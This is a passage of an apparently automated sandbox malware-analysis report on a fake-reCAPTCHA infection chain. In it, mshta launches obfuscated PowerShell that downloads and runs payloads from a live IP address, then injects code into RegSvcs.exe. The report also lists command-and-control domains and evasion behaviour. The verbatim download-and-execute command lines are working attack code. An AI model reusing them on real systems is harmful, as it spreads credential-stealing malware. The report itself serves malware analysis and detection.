                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep count: 5201 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 528Thread sleep count: 560 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 34000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 33859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 33748Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 33625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 33469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 33296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 33187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 33048Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32798Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32336Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 32013Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31345Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 31083Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30910Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30309Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30062Jump to behavior
                  Source: powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWuw
                  Source: mshta.exe, 00000003.00000003.2085261392.000002062AA10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW :
                  Source: mshta.exe, 00000003.00000003.2106231402.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105547941.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074972565.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137551691.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3292084105.000001A4C5059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3288215612.000001A4BFA2B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3287680799.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3331435261.0000000005421000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                  Source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeP
                  Source: powershell.exe, 00000007.00000002.2407828166.0000022DFF670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                  Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004402D0 LdrInitializeThunk,13_2_004402D0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi64_3276.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_6528.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_1644.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7256, type: MEMORYSTR
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 92.255.57.112MIIE3jCCAsagAwIBAgIQAMyl7gKxD8R/bGWvMD10ZTANBgkqhkiG9w0BAQ0FADAQMQ4wDAYDVQQDDAVXaXB3dzAgFw0yNTAxMDMwMDU2NDNaGA85OTk5MTIzMTIzNTk1OVowEDEOMAwGA1UEAwwFV2lwd3cwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCJBHoD8dGnUp6uYikMPGLQueXv2m1Xu0heqNGi2rCJpNYbl6KI9IV6SjdkExryLeKPYYSlWJ7DpE1Q7MIziyKNfFegW9a8TG2e/iEzAEo/tpV7x9RPIcRQ/edfva5A7UXDwXtDOBoYut0QSFv09mPd+CTwBK2QBs0oGsqD/xOsjVYJJ4KX1Hd96OdFoMaocbr2/5Vd8byNHtQ+l5gorVyZF2uB8sq3Atk6wnNCp2LpnVn0fLwXr1M5IrgyIGBJlxgnApZhEK4fw9312ERy4LBTeYPi0l4CWlSHSZtthWyfNpn0jl+yg+C6nt4Ty6Ddbs9Ch014fZot/dxSYY4HaEpGNiLJ6+wDTmiTtxPBYp9q6+zAR9HhQdrby9L2vhbmIbbVrD3TR+5TcegrQ8itsRmEzDIS+F7fnCxwtWuYfDYXSl0bjIgMfCzROhBr2AAWjU8YQLZjaeJ1AdBHDnwNXYeT75YAbl8ZjtKlQVknG+OW3CwtOxSQZ+fxg4ksAiddtvvGH3e4sqkmwEhX4YOTN3F+ueUINzIPBqLNOhwezuUzyOVedqJhEspsMOG7tN+2HOjLyMUxyT46zfa4feCZap9mmcxW1nTePXW5pSlWxOa4+PG+BOr0Cc7bPmTwBSWNnKy1dDVQyCuazmo9qJ7F9JaEW3tYtqjJheI8dPTlNcCbIwIDAQABozIwMDAdBgNVHQ4EFgQU6wPCBOLkp1AKy1BgfeO7G7mU/9wwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAIOkGO4X8MYgfkdBrYh0KLj11P8ETDbp9EokYcLU3xGh3qtdYRakKdtz4V2GwCWauK0sbOzIWqm+0nuF1BFG4Ff/n90e8zQy4Dx1HkrG+A/4NRiq/1ZRcUhXcEOCbCQlhREZtin6BwTno5ypVaqtWI7ip+OZZruNvVLAQaR2wPKe9W8M+ACn8ipeXGmtow9rqpnUM0KCgT36+TkDyiz6RqBxWjiyDWoodnkxuqrffZdMrob7FxYxWlXK9ODtx/88FBHz0wabvGFkHlWNAUr3BTBMyOyZZTOn08RLKDw90Uj/e9vQf9AutujdJtyhuXL/qbBVOa0bWHIbEdai5rFwo17XMBQhcVDD7cKi4UxpxdviOT3t0ALlE8Zw/NDNz/a0u+bQL3rP7+KCy4X9FidO6umTIoWRv8OSotXX+TsJf+HtG9/nBxEnBF0URXzzCTb20vTtrqfr0zeuZIZN/B0zU68bFS0FycEJVD1y47yhsBThhEVvUMWIYu/RlEENmiT5KYoHD6mcNEXvOUXYFHSiNhNP3ocZAAEirBiZWk2i/mwwd1iL6baDKt+7btwWjUUvqDtnZThWLXjsKkvk84tfiEwVBzZiv3tHotXZB6Y+ILVrE9HdE2I0zyhWIrVRE+tNQxTwb49fLxIF+SoF4K3lYK5Gnp4JYord3Uhmhmm9mZGo="Default:BAPPDATAJ3e74489724f9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: finickypwk.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shoefeatthe.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: savorraiykj.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kickykiduz.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: miniatureyu.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: leggelatez.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: washyceehsu.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bloodyswif.lat
                  Source: powershell.exe, 00000008.00000002.2321823186.000001D0902FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curtainykeo.lat
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 404000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 406000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 106C008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 450000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9E0008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FA9008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.htmlJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc|i`e`x Jump to behavior
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTeeq
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTeeq8
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002F27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTeeq(
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTeeqH
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh{eqx
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
